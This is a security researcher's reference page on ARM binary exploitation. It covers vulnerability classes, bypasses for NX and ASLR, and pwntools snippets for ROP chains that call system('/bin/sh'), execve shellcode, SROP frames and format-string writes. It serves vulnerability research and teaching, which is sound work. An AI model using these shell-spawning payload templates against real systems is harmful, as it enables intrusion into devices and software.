Most of the targets I work with at Talos are ARM-based embedded devices or stripped binaries with no symbols. When a fuzzer surfaces a crash, the next question is always the same: what class of bug is this, and can it be turned into something more than a denial of service. This page is the reference I keep open during that triage. It covers ARM architecture details, the vulnerability classes that come up most often and the pwntools calls I use to build and test payloads.
Overview
Binary exploitation turns software bugs (memory corruption, logic flaws, integer errors) into controlled execution. Modern targets combine multiple mitigations — ASLR, DEP/NX, stack canaries — so successful exploits chain techniques together rather than relying on a single primitive.
This page focuses on ARM exploitation concepts and the pwntools framework used to build and deliver payloads.
ARM architecture basics
ARM (Advanced RISC Machine) executes one instruction per CPU cycle on a 32-bit processor:
- General purpose registers: r0–r12 (13 total)
- Special registers: sp (stack pointer), lr (link register), pc (program counter)
- Operating modes: 32-bit ARM and 16-bit Thumb. Use
gcc -mno-thumbto force 32-bit. - No RET instruction: return by branching to LR (
bx lr) or popping a value into PC (pop {pc}).
ARM64 (AArch64) extends this to 64-bit with a richer register set (x0–x30, sp, pc).
Vulnerability classes
Stack buffer overflow
Overflow a stack variable to overwrite the saved return address (or LR). When the function returns, execution redirects to attacker-controlled code. The key target on ARM is the saved LR or the saved PC value on the stack.
Heap buffer overflow
The heap holds dynamically allocated chunks. Overflowing a heap chunk can corrupt adjacent metadata or function pointers. Unlike a stack overflow, the payoff is not immediate at function return — it fires when the overwritten pointer is dereferenced. This makes heap exploits more timing-sensitive and layout-dependent.
Use-after-free (UAF)
A pointer is used after the memory it references has been freed. Exploitation steps:
- Trigger the free of the target heap object.
- Reclaim the freed region with attacker-controlled allocation.
- Prepare a ROP payload at a known address.
- Overwrite function pointers in the reclaimed chunk.
- Trigger the code path that dereferences the freed pointer.
- Control jumps to the ROP payload.
Summary: free → overwrite → use.
Off-by-one / one-byte overflow
Writing exactly one byte past a buffer boundary. On 32-bit ARM, corrupting the LSB of a saved stack pointer or frame pointer is enough to redirect control flow.
Integer overflow
Sizing and casting bugs — mixing short/int/long or signed/unsigned types — can produce an unexpectedly small allocation size. The caller then writes more data than the allocation can hold, overflowing into adjacent memory.
Bypassing mitigations
DEP / NX — Return Oriented Programming (ROP)
ROP chains small existing code sequences ("gadgets") that each end with a ret or equivalent. Since gadgets are in executable memory, NX is irrelevant. The chain is placed on the stack; redirecting PC to the first gadget drives execution through the sequence.
Runtime memory patching via ROP: overwrite a critical variable without injecting shellcode — useful when only a flag needs flipping.
ASLR
Two strategies:
- Bruteforce: practical only on 32-bit (limited address space, ~16-bit entropy).
- Information leak: read a pointer from process memory (e.g., via format string: %p leaks stack addresses). Compute the ASLR slide as leaked_address - static_address. Apply the slide to relocate any gadget or function.
pwntools reference
Process interaction
from pwn import *
p = process('./target')
p = remote('127.0.0.1', 1337)
p = process(['./target', '--arg'], env={'VAR': 'val'})
# Attach GDB to running process
gdb.attach(p)
# Start under GDB with ASLR disabled
p = gdb.debug('./target', aslr=False, gdbscript='b *main+123')
# I/O
p.send(b'data') # write without newline
p.sendline(b'data') # write with newline
p.recv(n) # read n bytes
p.recvline() # read until \n
p.recvuntil('prompt') # read until delimiter
p.sendlineafter('> ', b'payload')
p.interactive() # hand control to terminal
Context
context.arch = 'aarch64' # or 'arm', 'amd64', 'i386'
context.endian = 'little' # or 'big'
context.log_level = 'info' # 'debug' | 'warn' | 'error'
Encoding and packing
# Integer ↔ bytes (little-endian by default)
p32(0xdeadbeef) # → b'\xef\xbe\xad\xde'
p64(0xcafebabe)
u32(b'\xef\xbe\xad\xde') # → 0xdeadbeef
# Cyclic sequences to find offsets
cyclic(32) # → b'aaaabaaacaaa...'
cyclic_find(0x61616164) # → 12 (byte offset)
ELF introspection
elf = ELF('./target')
elf.plt.puts # address of puts@PLT
elf.got['puts'] # address of puts@GOT
elf.sym['main'] # symbol address
# Set base address after leaking it (for ASLR bypass)
libc = ELF('./libc.so.6')
libc.address = leaked_libc_base
libc.sym.puts # now correctly rebased
bin_sh = next(libc.search(b'/bin/sh'))
ROP chain building
rop = ROP(elf)
# Find specific gadgets
pop_rdi = rop.rdi.address
syscall = rop.find_gadget(['syscall', 'ret']).address
# Build chain
rop.call(elf.sym.puts, [elf.got['puts']]) # leak puts address
rop.call(libc.sym.system, [bin_sh]) # shell
payload = b'A' * offset + rop.chain()
Shellcraft and assembly
shellcode = shellcraft.sh() # /bin/sh via execve
payload = bytes(asm(shellcode))
# Or manually
shellcode = asm('''
lea rdi, [rip+bin_sh]
xor rsi, rsi
xor rdx, rdx
mov rax, SYS_execve
syscall
bin_sh:
.string "/bin/sh"
''')
SROP (Sigreturn ROP)
Used when gadget availability is limited. A sigreturn syscall restores a full register context from the stack, giving full control over all registers in one shot.
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
payload = b'A' * offset + p64(sigret_gadget) + bytes(frame)
Format string exploits
# Automated payload for arbitrary writes
writes = {target_addr: value}
payload = fmtstr_payload(offset, writes)
# Auto-detect offset
def send_data(payload):
p.sendline(payload)
return p.recvall()
fmt = FmtStr(execute_fmt=send_data)
offset = fmt.offset
What I reach for first
Stack buffer overflows are the starting point: straightforward offset calculation with cyclic, confirm PC control, then layer in a ROP chain to bypass NX. For targets where ASLR is the main obstacle, I look for a format string primitive first — a single %p leak often collapses the address space problem before anything else needs solving.